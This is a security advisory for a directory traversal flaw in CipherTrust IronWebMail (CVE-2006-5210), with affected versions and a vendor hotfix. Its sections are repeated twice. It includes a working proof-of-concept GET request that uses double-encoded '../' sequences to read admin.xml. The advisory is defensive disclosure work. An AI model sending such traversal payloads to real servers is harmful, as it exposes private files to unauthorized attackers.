IronWebMail Directory Traversal Information Disclosure Vulnerability
BID:20436
Info
IronWebMail Directory Traversal Information Disclosure Vulnerability
| Bugtraq ID: | 20436 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5210 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 16 2006 12:00AM |
| Updated: | Oct 16 2006 08:59PM |
| Credit: | Derek Callaway reported this issue to the vendor. |
| Vulnerable: |
CipherTrust IronMail 6.1.1 CipherTrust IronMail 5.0.1 CipherTrust IronMail 4.5.1 CipherTrust IronMail 4.1 CipherTrust IronMail 6.0 CipherTrust IronMail 5.0 |
| Not Vulnerable: |
CipherTrust IronMail 6.1.1 HotFix-17 |
Discussion
IronWebMail Directory Traversal Information Disclosure Vulnerability
IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with the privileges of the webserver process. Information harvested may aid in further attacks.
IronWebMail versions prior to 6.1.1 HotFix-17 are affected by this vulnerability.
IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with the privileges of the webserver process. Information harvested may aid in further attacks.
IronWebMail versions prior to 6.1.1 HotFix-17 are affected by this vulnerability.
Exploit / POC
IronWebMail Directory Traversal Information Disclosure Vulnerability
Attackers use a standard web browser to exploit this issue.
The following proof-of-concept GET request data demonstrates this issue:
GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]
Attackers use a standard web browser to exploit this issue.
The following proof-of-concept GET request data demonstrates this issue:
GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]
Solution / Fix
IronWebMail Directory Traversal Information Disclosure Vulnerability
Solution:
The vendor has released fixes to address this issue.
Solution:
The vendor has released fixes to address this issue.
References
IronWebMail Directory Traversal Information Disclosure Vulnerability
References:
References:
- IronMail Homepage (CipherTrust)